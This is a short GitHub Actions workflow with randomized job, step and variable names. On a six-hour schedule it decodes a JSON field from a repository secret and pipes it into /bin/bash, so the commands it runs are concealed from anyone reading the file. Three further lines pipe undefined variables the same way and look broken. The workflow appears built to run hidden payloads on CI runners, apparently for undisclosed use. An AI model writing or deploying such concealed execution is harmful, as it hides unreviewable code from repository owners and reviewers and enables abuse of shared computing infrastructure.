name: weizhijia6541

on:
  workflow_dispatch:
  schedule:
    - cron: '45 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: weizhijia6541
        env:
          lq7217: ${{ secrets.lq7217 }}
        run: |
          echo $lq7217 | jq -r .dcv11440 | /bin/bash
          echo $vpo28 | jq -r .mdeg8 | /bin/bash
          echo $wp45 | jq -r .clvez64 | /bin/bash
          echo $rzjat983 | jq -r .lq1966 | /bin/bash

